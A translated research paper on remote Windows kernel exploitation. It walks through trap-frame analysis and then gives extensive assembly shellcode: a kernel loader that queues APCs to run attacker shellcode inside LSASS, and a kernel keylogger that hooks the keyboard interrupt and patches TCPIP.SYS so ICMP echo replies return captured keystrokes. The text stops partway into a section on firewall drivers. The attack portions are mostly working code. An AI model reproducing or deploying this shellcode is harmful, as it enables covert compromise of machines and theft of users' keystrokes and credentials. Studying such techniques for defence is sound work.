Remote Windows Kernel Exploitation
Author: Barnaby Jack
Translation: Polaris 2003
Email: zhangjingsheng_nbu@yahoo.com.cn
Note: This translation covers only the relevant technical content of the original and omits a small amount of redundant material.
----------------------------------------------------------------------
The i386 architecture supports four privilege levels, usually called rings, that separate the kernel from user land. Windows NT uses only two of them, which allows the NT operating system to run on architectures that do not support all four levels. User-land code, such as applications and system services, runs at ring 3. A user-mode process can only access the 2 GB of memory assigned to it, and user code is pageable and subject to context switching. Kernel code runs at ring 0: the hardware abstraction layer, I/O, memory management, and the graphics interface all run there. Code executing at ring 0 runs with full system privileges, can access all memory, and can use privileged instructions.

By design, a user-mode process cannot switch privilege levels freely, and the whole Windows NT security model depends on this restriction. Of course, this security model has been circumvented on more than one occasion. Sometimes a user-mode task cannot be completed without kernel-level functionality, and this is the origin of the Native API. The Native API is an undocumented set of internal functions that run in kernel mode. It exists to give user mode a safe way to call kernel-mode services. A user application can call the Native API functions exported by NTDLL.DLL, which exports a large number of functions that wrap the corresponding kernel functions.
If you disassemble one of these functions, you will find something similar to the following.

Windows 2000:

    mov eax, 0x0000002f
    lea edx, [esp+04]
    int 0x2e

Each Native API function exported by NTDLL reduces to a small stub that switches the execution environment to kernel mode. First a register is loaded with an index into the system service table, and then the required function is reached at the corresponding offset in NTOSKRNL.

Windows XP:

    mov eax, 0x0000002f
    mov edx, 7ffe0300
    call edx

At offset 0x7ffe0300:

    mov edx, esp
    sysenter
    ret

On a Pentium II or later, the situation is somewhat different under Windows XP. Windows XP switches between user mode and kernel mode with the SYSENTER/SYSEXIT instruction pair, which makes creating kernel shellcode a little harder, as explained later. To create kernel-mode shellcode successfully, you must forget all user-level APIs and use only the kernel-level Native API functions. More documentation on the Native API can be found in Gary Nebbett's "Windows NT/2000 Native API Reference".

The nature of the blue screen

When you find a kernel vulnerability, the first thing you face after sending packets to the remote system is a blue screen. To exploit a kernel-level vulnerability successfully, you first need to understand how the "Blue Screen of Death" comes about.
When you see a BSOD, the native function KeBugCheckEx has been called. There are two ways this can happen:

1. It is called by the kernel exception dispatcher.
2. It is called directly by error-checking code.

The kernel exception handling chain works as follows. When an exception is generated, the kernel gains control through the function entries in the IDT (interrupt descriptor table), named KiTrapXX. These functions form the first-level trap handlers. A trap handler may handle the exception itself, pass it to the next exception handler, or, if the exception cannot be handled, call KeBugCheckEx directly. In either case, to learn the cause and location of the exception we need the trap frame. A trap frame is a structure similar to a context structure. With it we can obtain the state of all registers and the address the instruction pointer held when the exception occurred.

I tend to use the Compuware/NuMega SoftICE debugger for all my work, but when it comes to trap frames, WinDbg offers better structure recognition. With SoftICE alone, I have to locate the relevant stack parameters manually. If your computer is configured to write a memory dump when a blue screen occurs, the default path of the dump file is %SystemRoot%\MEMORY.DMP. Start WinDbg, select "Open Crash Dump", and load the saved file. The following is an example in which the trap handler calls KeBugCheckEx directly. After loading the memory dump file, WinDbg reports the following.
WinDbg shows that KeBugCheckEx was called by the trap handler KiTrap0E and that the trap frame is at address 0x8054199c. Now use the "trap <address>" command to display the contents of the trap frame. We can then see the state of all registers at the time the exception was raised, and part of memory can be displayed as well. The instruction pointer holds 0x41414141, an address in user space, so we can now redirect execution as we wish. In this case our data is pointed to by the ESP register. We can therefore use the offset of a JMP ESP, CALL ESP, PUSH ESP / RET or similar sequence to redirect execution, and any standard overflow technique can be used to exploit the vulnerability.

If KeBugCheckEx is triggered by the exception dispatcher, the trap frame is passed as the third parameter to KiDispatchException. In this case you need to pass the address held in the third parameter to the trap command. When redirecting execution to an offset, the offset must be a static memory address, that is, an address that does not change.

Shellcode examples

The first shellcode example is a "kernel loader". It allows arbitrary user-land code to be plugged in and executed safely, which is very convenient for running a remote shell or any other user-level shellcode.

The second example is pure kernel code. It installs a keyboard interrupt handler that captures all keyboard input, and then patches the ICMP handler in tcpip.sys so that the keyboard buffer is returned to the remote system in response to an ICMP ECHO request. This code is small and uses very few API functions. To make the following examples fully understandable, the corresponding source code is reproduced alongside the text.

The "kernel loader"

There are many techniques for moving code from kernel mode to user mode and executing it. You can change the EIP of a running thread so that it points to your code, but if this technique is used, the running process will be destroyed.
You can use the RtlCreateUserThread and RtlCreateUserProcess functions in ntoskrnl, which are used to create SMSS.EXE (the only process without a parent process, created directly by the kernel). However, there are two problems. First, they are not exported functions. Second, and this is the bigger problem, they are located in the INIT section of ntoskrnl, which means they are no longer available by the time our code runs. It would therefore be necessary to re-map ntoskrnl, initialize some global variables (_MmHighestUserAddress and _NtGlobalFlag), and of course find the addresses of the functions.

Another possible method is to create a remote thread in a user-land process and direct execution to it. firew0rker discusses this approach: http://www.phrack.org/phrack/62/p62-0x06_kernel_mode_backdoors_for_windows_nt.txt

Unfortunately, this method also has a flaw. When the user-level code executes, the API function CreateProcess may fail because the CSRSS subsystem must be notified. The workaround is to build a new context structure in the user-level shellcode. Since the goal is to keep the shellcode as small as possible and to be able to plug in arbitrary user-land code, this workaround is not a viable option. Because the method also uses functions exported by NTDLL, it causes problems on systems other than Windows 2000.
Windows 2000 uses interrupt 0x2E to move from ring 3 to ring 0, and this works whether it is invoked from ring 3 or from ring 0. The problem arises under Windows XP, which uses SYSENTER to switch from ring 3 to ring 0. If a function exported by NTDLL is called directly from the kernel, a blue screen follows. To solve this, additional code is needed to look up the ntoskrnl function in the system service table.

I decided to execute the user-land shellcode by means of asynchronous procedure calls (APCs). This method only uses functions exported directly by ntoskrnl. When a user thread is in an "alertable wait state", the queued function is executed immediately. A thread enters an alertable wait state when it calls a function such as SleepEx, WaitForSingleObjectEx, SignalObjectAndWait, or MsgWaitForMultipleObjectsEx with the bAlertable flag set to TRUE. This method requires the smallest number of API calls and is relatively reliable. All the functions we will use are exported by ntoskrnl.

The first step is to obtain the base address of ntoskrnl manually. To do this we use a technique known as "mid-delta": first obtain a pointer into the ntoskrnl address space, then decrement that pointer until the executable file signature "MZ" is reached. To obtain a pointer into the ntoskrnl address space, we take the first entry of the interrupt descriptor table (IDT), because this entry points to a location inside ntoskrnl. The following code reads a pointer from the IDT and then finds the base address by decrementing the pointer.

    mov esi, dword ptr ds:[0ffdff038h] ; get the IDT address
    lodsd
    cdq
    lodsd                              ; get pointer into NTOSKRNL
    @base_loop:
    dec eax
    cmp dword ptr [eax], 00905a4dh     ; check for the "MZ" signature
    jnz @base_loop

The usual way of obtaining the IDT base address is the SIDT instruction. Since the IDT is also pointed to by address 0xFFDFF038, I can read the IDT address directly, which saves a few bytes.
You may notice that the code above does not obtain the complete address of the IDT entry's handler. We only obtain the high word of the handler address. The low word, which ranges over 0-0xFFFF, can be ignored, because the resulting pointer still lies inside the ntoskrnl address space.
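The following Python sketch simulates the two ideas above on a plain byte buffer, not on real kernel memory. It shows why reading only the second dword of an 8-byte gate descriptor still gives a pointer with the correct high word, and how stepping backwards finds the "MZ" dword. The region base, handler address, selector, and flags are hypothetical values chosen for illustration, and the helper names are not from the original.

```python
import struct

MZ_DWORD = 0x00905A4D  # bytes 4D 5A 90 00, the value compared in the listing

def pointer_from_gate(gate):
    """Mimic lodsd / cdq / lodsd: keep only the second dword of the 8-byte gate."""
    _first, second = struct.unpack("<II", gate)
    return second

def find_image_base(memory, region_base, pointer):
    """Step backwards one byte at a time until the MZ dword is found."""
    offset = min(pointer - region_base, len(memory) - 4)
    while offset >= 0:
        if struct.unpack_from("<I", memory, offset)[0] == MZ_DWORD:
            return region_base + offset
        offset -= 1
    return None

# Hypothetical layout: an image header at 0x80401000 inside a simulated region.
REGION_BASE = 0x80400000
memory = bytearray(0x20000)
struct.pack_into("<I", memory, 0x1000, MZ_DWORD)

# Hypothetical handler address; a gate stores offset low, selector, flags, offset high.
handler = 0x80406ABC
gate = struct.pack("<HHHH", handler & 0xFFFF, 0x0008, 0x8E00, handler >> 16)

pointer = pointer_from_gate(gate)  # high word is right, low word is the flags field
image_base = find_image_base(memory, REGION_BASE, pointer)
print(hex(pointer), hex(image_base))
```

The pointer differs from the true handler address in its low 16 bits, but since the scan only needs some address inside the image, the backward search still ends at the same header.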
    hash_table:
    dw 063dfh ; "PsLookupProcessByProcessId"
    _pslookupprocessbyprocessid equ [ebx]
    dw 0df10h ; "KeDelayExecutionThread"
    _kedelayexecutionthread equ [ebx+4]
    dw 0f807h ; "ExAllocatePool"
    _exallocatepool equ [ebx+8]
    dw 057d2h ; "ZwYieldExecution"
    _keyieldexecution equ [ebx+12]
    dw 07b23h ; "KeInitializeApc"
    _keinitializeapc equ [ebx+16]
    dw 09dd1h ; "KeInsertQueueApc"
    _keinsertqueueapc equ [ebx+20]
    hash_table_end:

Next we create a hash table in which every required function is represented by a word-sized hash. Function name strings often take up a large amount of space in Win32 shellcode, so a hashing mechanism is more sensible. The pointers to the functions are stored in a table that the shellcode accesses through the EBX register. A standard "GetProcAddress" routine is then performed: it parses the export table of ntoskrnl and obtains the entry address of each function. The hash routine is simple: an XOR/ROR operation is applied to each byte of the exported function name. I use word-sized hashes rather than dword-sized hashes to keep the shellcode as short as possible.

Once all the required entry addresses have been resolved, the next task is to allocate a new memory block to hold the shellcode. Because the code currently resides on the stack, it must be copied to a new memory block. Otherwise later kernel function calls may overwrite large parts of it, especially once we request a lower IRQL (Interrupt Request Level). We pass NonPagedPool to ExAllocatePool, copy the shellcode to the non-paged area, and then execute a JMP into this memory. From this point on, all the code can run safely without being disturbed.

When exploiting a driver, we must be aware of the current IRQL. The IRQL is the hardware priority at which a kernel routine is currently running, and many kernel routines require the IRQL to be PASSIVE (0) in order to execute successfully.
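To make the hashing step described above concrete, here is a minimal Python sketch of a 16-bit XOR/ROR name hash and a lookup by hash. The text only states that an XOR/ROR operation is applied to each byte, so the rotate count, the order of the two operations, and the function names here are assumptions. The sketch is not expected to reproduce the hash values in the table above.

```python
def ror16(value, count):
    """Rotate a 16-bit value right by count bits."""
    count %= 16
    return ((value >> count) | (value << (16 - count))) & 0xFFFF

def name_hash(name, rotate=3):
    """Fold each byte of the name into a 16-bit hash with XOR, then ROR.

    The rotate count of 3 is an arbitrary choice for illustration.
    """
    h = 0
    for byte in name.encode("ascii"):
        h = ror16(h ^ byte, rotate)
    return h

def resolve(exports, wanted_hashes):
    """Return the address for each wanted hash, in table order.

    exports maps exported names to addresses. A hash with no matching
    export yields None.
    """
    by_hash = {name_hash(name): address for name, address in exports.items()}
    return [by_hash.get(h) for h in wanted_hashes]

# Hypothetical export table with made-up addresses.
exports = {"A": 0x1000, "B": 0x2000}
table = [name_hash("B"), name_hash("A")]
print([hex(address) for address in resolve(exports, table)])
```

Storing two bytes per function instead of the full name is the size saving the text refers to. The cost is a small chance of collisions between export names, which a real table would need to be checked against.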
If we are running at DISPATCH (2) level (used for thread scheduling and deferred procedure calls), we must lower the IRQL to PASSIVE. This is simple: call the function KeLowerIrql exported by the HAL and pass 0 (PASSIVE) as the parameter.

Now we need to attach the user-land code to a process. First we must obtain a pointer to an EPROCESS structure. Every process has a corresponding EPROCESS structure. All structures mentioned in this article can be examined by dumping them in WinDbg (for example: dt nt!_EPROCESS). The functions we will use require offsets into the EPROCESS structure. If you can obtain a pointer to any one EPROCESS structure, you can reach all currently active processes by traversing the list that links the structures. Normally the first EPROCESS structure can be obtained by calling PsGetCurrentProcess.
Unfortunately, when exploiting a remote driver we may end up in the "idle" address space, in which case the call does not return a valid process control block. I use PsLookupProcessByProcessId instead and pass the PID of the "System" process as the parameter. This value is 4 on Windows XP and 8 on Windows 2000.

    lea ebp, [edi-4]
    push ebp
    push 04
    call dword ptr _pslookupprocessbyprocessid ; get System EPROCESS
    mov eax, [ebp]                             ; get System EPROCESS pointer

Having obtained the first EPROCESS structure, we can now reach all currently active processes. Although I chose to inject the code into the LSASS address space, any running SYSTEM process is a suitable target. To reach LSASS, we loop over the entries linked through the ActiveProcessLinks field of EPROCESS and compare each module name with that of LSASS.

    mov cl, EP_ActiveProcessLinks       ; offset to ActiveProcessLinks
    add eax, ecx                        ; get address of EPROCESS+ActiveProcessLinks
    @eproc_loop:
    mov eax, [eax]                      ; get next EPROCESS struct
    mov cl, EP_ModuleName
    cmp dword ptr [eax+ecx], "sasl"     ; is it LSASS?
    jnz @eproc_loop

Once the LSASS process has been found, subtracting the ActiveProcessLinks offset gives the address of the start of the LSASS EPROCESS structure.

The next step is to copy the shellcode into the target memory space. At first I intended to store the code in the PEB. Previously the PEB was always mapped at 0x7ffdf000, but in XP SP2 the address of the PEB is randomized. Although the PEB can be found via 0xffdff000->0x18->0x30, we have a better choice: store the code in the memory area shared between kernel and user mode, usually called SharedUserData. 0xFFDF0000 is a writable memory area where we can save our code. This memory is mapped into user land as read-only at 0x7ffe0000. The mapping is the same on all platforms, so it is a good choice.
Since this memory area is readable by all processes, there is no need to switch the address space to that of the target process. We can write directly from the kernel to 0xFFDF0000+0x800. When queuing the user-mode APC, 0x7ffe0000+0x800 is passed as the parameter.

    call @get_eip2
    @get_eip2:
    pop esi
    mov cx, shellcode-$+1
    add esi, ecx                        ; get shellcode address
    mov cx, (shellcode_end-shellcode)   ; shellcode size
    mov dword ptr [edi], SMEM_ADDR      ; 0xFFDF0000+0x800
    push edi
    mov edi, [edi]                      ; copy shellcode to SharedUserData
    rep movsb
    pop edi

Now we need to find a thread that can run the APC function. An APC can be a kernel-mode APC or a user-mode APC, and here we queue a user-mode APC. If the thread we pass is not in an alertable wait state, the user-mode APC will not be called.
As mentioned earlier, a thread enters this state by calling SleepEx, SignalObjectAndWait, WaitForMultipleObjectsEx, or WaitForSingleObjectEx with bAlertable set to TRUE. To find a usable thread, we take the ETHREAD pointer of the process and walk through its threads until we find one in the state we need.

    mov edx, [edi+16]                         ; pointer to EPROCESS
    mov ecx, [edx+ET_ThreadListHead]          ; get ETHREAD pointer
    @find_delay:
    mov ecx, [ecx]                            ; get next thread
    cmp byte ptr [ecx-ET_ThreadState], 04h    ; thread in DelayExecution?
    jnz @find_delay

The code above first obtains a pointer to an ETHREAD structure of LSASS through the ThreadListHead LIST_ENTRY of the EPROCESS structure, and then checks the thread state flag. Once the target thread has been found, we set EBP to point to its KTHREAD structure and then initialize the APC.

    xor edx, edx
    push edx
    push 01                           ; push processor
    push dword ptr [edi]              ; push EIP of shellcode (0x7ffe0000+0x800)
    push edx                          ; push NULL
    push offset KROUTINE              ; push KERNEL routine
    push edx                          ; push NULL
    push ebp                          ; push KTHREAD
    push esi                          ; push APC object
    call dword ptr _keinitializeapc   ; initialize APC

We pass the EIP of the user-mode shellcode as a parameter to KeInitializeApc, and we must also pass a kernel routine that will be called. We do not need this routine to do anything, so it simply points to a return instruction in the shellcode. The KTHREAD structure of the thread is required in order to run our APC, and the APC object is returned in the variable pointed to by ESI. Now we can insert our APC into the APC queue of the target thread.

    push eax                          ; push 0
    push dword ptr [edi+4]            ; system arg
    push dword ptr [edi+8]            ; system arg
    push esi                          ; APC object
    call dword ptr _keinsertqueueapc

The last function, KeInsertQueueApc, delivers the APC. In the code above EAX is 0, the two system arguments are pointers to null, and the APC object is the one returned by KeInitializeApc.
Finally, to keep our loader thread from returning and causing a blue screen, we pass 0x80000000:00000000 to KeDelayExecutionThread to put the thread to sleep.

    push offset LARGE_INT
    push FALSE
    push KernelMode
    call dword ptr _kedelayexecutionthread

If we have accidentally ended up in the "idle" address space, this call will fail.
The way to solve this problem is to yield execution and keep looping. The code snippet is as follows:

    @yield_loop:
    call dword ptr _keyieldexecution
    jmp @yield_loop

At this point the user-mode code should be executing safely in the SYSTEM process you selected. If the user code calls ExitThread when the APC function has finished, the system should remain stable.

The ICMP Patching Interrupt Hooking Key-Logger

While chatting with Derek Soeder of eEye, we discussed what kind of useful shellcode could consist entirely of kernel code. One idea was a kernel-level key-logger that returns the keyboard buffer to a remote user. Since this is shellcode, creating a complete keyboard filter and a communication channel would greatly exceed the acceptable code length, so shortcuts are required. We use a technique that dates from the DOS era: instead of attaching a keyboard filter to capture keyboard messages, we replace the keyboard interrupt handler and capture the scan codes. Rather than creating a channel back to the remote user, I decided to patch the ICMP handler in the TCPIP.SYS driver. The patch modifies the ICMP ECHO handling so that the original buffer is replaced with our own keyboard buffer. Sending an ICMP ECHO request to the remote system then returns the captured keystrokes.

The first step is to replace the IDT entry of the keyboard handler with our own interrupt handler. Windows XP and Windows 2000 SP4 keep an IRQ-to-interrupt-vector table in the HAL memory area. We can easily search for the signature bytes next to it and look up the interrupt vector that corresponds to IRQ1 (the keyboard IRQ). In early service packs, such as Windows 2000 SP0, this table does not exist, but the interrupt vectors are static: IRQ1 = vector 0x31, IRQ2 = vector 0x32, and so on. The following code first attempts to locate the vector table.
If the table cannot be located, interrupt vector 0x31 is used directly.
    mov esi, dword ptr ds:[0ffdff038h] ; get the IDT base address
    lodsd
    cdq
    lodsd                              ; get pointer into NTOSKRNL
    @base_loop:
    dec eax
    cmp dword ptr [eax], 00905a4dh     ; check for the MZ signature
    jnz @base_loop
    jecxz @hal_base                    ; NTOSKRNL base address is in eax
    xchg edx, eax
    mov eax, [edx+590h]                ; get a pointer to a HAL function
    xor ecx, ecx
    jmp @base_loop                     ; look for the HAL base address
    @hal_base:
    mov edi, eax                       ; save the HAL base address in edi
    mov ebp, edx                       ; save the NTOSKRNL base address in ebp
    cld
    mov eax, 41413d00h                 ; signature bytes "\0=AA"
    xor ecx, ecx
    dec cx
    shr ecx, 4
    repnz scasd                        ; search for the signature
    or ecx, ecx
    jz @no_table
    lea edi, [edi+01ch]                ; get pointer to the vector table
    push edi
    inc eax                            ; IRQ 1
    repnz scasb
    pop esi
    sub edi, esi
    dec edi                            ; get the keyboard interrupt vector
    jmp @table_ok
    @no_table:
    mov edi, 031h                      ; if the table does not exist, use the static value
    @table_ok:
    push edx
    sidt [esp-2]                       ; get IDT
    pop edx
    lea esi, [edx+edi*8+4]             ; keyboard handler entry in the IDT
    std
    lodsd
    lodsw                              ; eax = keyboard handler entry address
    mov dword ptr [handler_old], eax   ; save it

The code first saves the base addresses of ntoskrnl and HAL.DLL, and then searches the HAL address space for the "\0=AA" signature. This dword signature marks the start of the IRQL-to-TPR translation table. If the signature is not found, we set the interrupt vector to 0x31. If it is found, the IRQ table we need is located using an offset of 0x1C. We then locate the vector that corresponds to the keyboard IRQ1, and use the SIDT instruction to obtain the base address of the IDT. The address of the IDT entry for an interrupt vector is given by:

    IDT_BASE + INT_VECTOR * 8

We read the address of the original interrupt handler from the IDT and save it at the start of our handler, so that control returns to the original handler when our handler has finished its own work.
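The arithmetic above can be checked with a short Python sketch that works on plain bytes only. It applies the static IRQ-to-vector fallback quoted in the text, computes the entry address with IDT_BASE + INT_VECTOR * 8, and shows how a 32-bit handler address is split across the low and high words of an 8-byte gate descriptor. The IDT base, selector, flags, and handler addresses are hypothetical values, and the function names are introduced here for illustration.

```python
import struct

IDT_ENTRY_SIZE = 8  # each 32-bit IDT gate descriptor occupies 8 bytes

def static_vector(irq):
    """Static mapping quoted in the text: IRQ1 -> 0x31, IRQ2 -> 0x32."""
    return 0x30 + irq

def idt_entry_address(idt_base, vector):
    """IDT_BASE + INT_VECTOR * 8."""
    return idt_base + vector * IDT_ENTRY_SIZE

def handler_from_gate(gate):
    """Rebuild the handler address: low word in bytes 0-1, high word in bytes 6-7."""
    low, _selector, _flags, high = struct.unpack("<HHHH", gate)
    return (high << 16) | low

def gate_with_handler(gate, handler):
    """Return a copy of the gate with only the two offset words replaced."""
    _low, selector, flags, _high = struct.unpack("<HHHH", gate)
    return struct.pack("<HHHH", handler & 0xFFFF, selector, flags, handler >> 16)

# Hypothetical values for illustration only.
IDT_BASE = 0x8003F400
entry = idt_entry_address(IDT_BASE, static_vector(1))
old_gate = struct.pack("<HHHH", 0x6ABC, 0x0008, 0x8E00, 0x8040)
new_gate = gate_with_handler(old_gate, 0x81234567)

print(hex(entry), hex(handler_from_gate(old_gate)), hex(handler_from_gate(new_gate)))
```

Because the two halves of the offset are not adjacent in the descriptor, replacing a handler takes two separate 16-bit writes, which is why interrupts have to be masked while the entry is being changed.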
The following code replaces the original handler entry in the IDT with our custom interrupt handler:

    cld
    mov eax, @handler_new
    cli                 ; mask interrupts while rewriting the entry
    mov [esi+2], ax     ; overwrite the IDT entry with the new handler address
    shr eax, 16
    mov [esi+8], ax
    sti                 ; re-enable interrupts

Next we call ExAllocatePool to allocate a buffer for the captured keyboard input. We also need to locate the base address of TCPIP.SYS by examining ntoskrnl. Unfortunately PsLoadedModuleList is not a public export, so we have to locate it manually. The MmGetSystemRoutineAddress function exported by ntoskrnl uses this list. To obtain the required pointer, we start at the address of MmGetSystemRoutineAddress and locate PsLoadedModuleList by incrementing the address.

    mov edi, _mmgetsystemroutineaddress
    @mmgsra_scan:
    inc edi
    mov eax, [edi]
    sub eax, ebp
    test eax, 0FFE00003h
    jnz @mmgsra_scan
    mov ebx, [edi]
    cmp ebx, [edi+5]            ; check for the PsLoadedModuleList pointer
    je @pslml_loop
    cmp ebx, [edi+6]
    jne @mmgsra_scan
    @pslml_loop:                ; found _PsLoadedModuleList
    mov ebx, [ebx]
    mov esi, [ebx+30h]
    mov edx, 50435449h          ; "ITCP", check for the TCPIP.SYS module
    push 4
    pop ecx
    @pslml_name_loop:
    lodsw
    ror edx, 8
    sub al, dl
    je @pslml_name_loop_cont
    cmp al, 20h
    @pslml_name_loop_cont:
    loopz @pslml_name_loop
    @pslml_loop_cont:
    jnz @pslml_loop
    mov edi, [ebx+18h]          ; TCPIP.SYS module base address

The code above first scans the MmGetSystemRoutineAddress routine to find the pointer to the linked list. The system module list entries are structured as follows:

    00h  LIST_ENTRY
    08h  ???
    18h  LPVOID          module base address
    1Ch  LPVOID          ptr to entry point function
    20h  DWORD           size of image in bytes
    24h  UNICODE_STRING  full path and file name of module
    2Ch  UNICODE_STRING  module file name only
    ...

The code then walks the linked list to obtain the base address of the TCPIP.SYS module.
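As an illustration of the entry layout listed above, the Python sketch below decodes a synthetic module-list entry from a byte buffer. The offsets come from the listing, and the UNICODE_STRING header is decoded in its 32-bit form (two 16-bit lengths followed by a 32-bit buffer pointer), which is consistent with the name pointer being read from offset 30h in the assembly. All addresses and sizes are made up, the helper names are hypothetical, and the name comparison is a simplified case-insensitive prefix test, not a literal translation of the assembly loop.

```python
import struct

def parse_unicode_string(entry, offset):
    """Decode a 32-bit UNICODE_STRING header: Length, MaximumLength, Buffer."""
    length, maximum_length, buffer_ptr = struct.unpack_from("<HHI", entry, offset)
    return {"length": length, "maximum_length": maximum_length, "buffer": buffer_ptr}

def parse_module_entry(entry):
    """Decode the fields named in the layout above from one list entry."""
    flink, blink = struct.unpack_from("<II", entry, 0x00)
    base, entry_point, image_size = struct.unpack_from("<III", entry, 0x18)
    return {
        "flink": flink,
        "blink": blink,
        "base": base,
        "entry_point": entry_point,
        "image_size": image_size,
        "full_name": parse_unicode_string(entry, 0x24),
        "base_name": parse_unicode_string(entry, 0x2C),
    }

def name_starts_with(name_utf16, prefix="TCPI"):
    """Case-insensitive check of the first characters of a UTF-16 name."""
    text = name_utf16.decode("utf-16-le")
    return text[:len(prefix)].upper() == prefix.upper()

# Synthetic entry with made-up values.
entry = bytearray(0x34)
struct.pack_into("<II", entry, 0x00, 0x81000000, 0x82000000)
struct.pack_into("<III", entry, 0x18, 0xF7000000, 0xF7001234, 0x58000)
struct.pack_into("<HHI", entry, 0x2C, 18, 20, 0xE1000000)

module = parse_module_entry(entry)
print(hex(module["base"]), hex(module["base_name"]["buffer"]))
print(name_starts_with("tcpip.sys".encode("utf-16-le")))
```

Comparing only the first four characters keeps the check short, at the cost of matching any module whose name begins with the same letters.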
This code is closer to a software crack than to network shellcode, because we patch the TCPIP driver so that we can receive the keyboard input from the remote system. There are many ways to turn the ICMP ECHO handler into a communication channel.
Our shellcode patches SendEcho in TCPIP.SYS. Since the complete disassembly is too long, only the relevant part matters here. In that part of the disassembly, [edx+8] is a pointer to the ICMP ECHO buffer, so changing the code so that [edx+8] points to our keyboard buffer is very easy.

    mov eax, 428be85dh          ; byte sequence in the TCPIP.SYS address space
    @find_patch:
    inc edi
    cmp dword ptr [edi], eax
    jnz @find_patch
    add edi, 5
    mov al, 68h
    stosb                       ; store "push"
    mov eax, edx                ; edx points to the keyboard buffer
    stosd                       ; store the keyboard buffer pointer
    mov eax, 08428f90h          ; "pop [edx+08h] / nop"
    stosd

After this code has run, the patched instructions read:

    push keybuffer_offset
    pop [edx+8]
    nop

When an ICMP ECHO request is sent to the remote system, the reply packet contains the captured keyboard input. The replacement interrupt handler itself is simple: when our handler is called, it reads the scan code from the keyboard port and saves it in the key buffer.

    @handler_new:
    push 0deadbeefh             ; save the current handler pointer
    handler_old equ $-4
    pushfd
    pushad
    xor eax, eax
    lea edi, keybuf             ; overwritten with the allocated buffer address
    kb_patch equ $-4
    in al, 60h                  ; get the keyboard scan code
    test al, al                 ; no scan code?
    jz @done
    push edi
    mov ecx, [edi]
    lea edi, [edi+ecx+4]
    stosb                       ; store code in buffer
    inc ecx
    pop edi
    cmp cx, 1023
    jnz @done
    xor ecx, ecx
    @done:
    mov [edi], ecx
    popad
    popfd
    db 0c3h                     ; return

Whenever a keyboard interrupt occurs, the code above is called, and the address of the original interrupt handler (patched in earlier) is pushed onto the stack. The current scan code is read from port 0x60 and saved in the allocated buffer. The buffer can hold 0x3FF keystrokes. If more scan codes arrive, they wrap around and overwrite the beginning of the buffer.

Thoughts on exploiting firewall drivers

When exploiting a kernel-level vulnerability in a firewall driver, there are many issues to consider.
The vulnerability we want to demonstrate occurs while DNS responses are being processed, and DNS responses are handled by SYMDNS.SYS. If the DNS processing does not return successfully, socket communication is not possible. Before studying this problem, we must first understand how the protocol layers communicate. Below is an outline of the network layers:

1). Network Driver Interface Specification layer: NDIS provides the path from the physical device to the network transports, and NDIS drivers interface directly with the network adapter.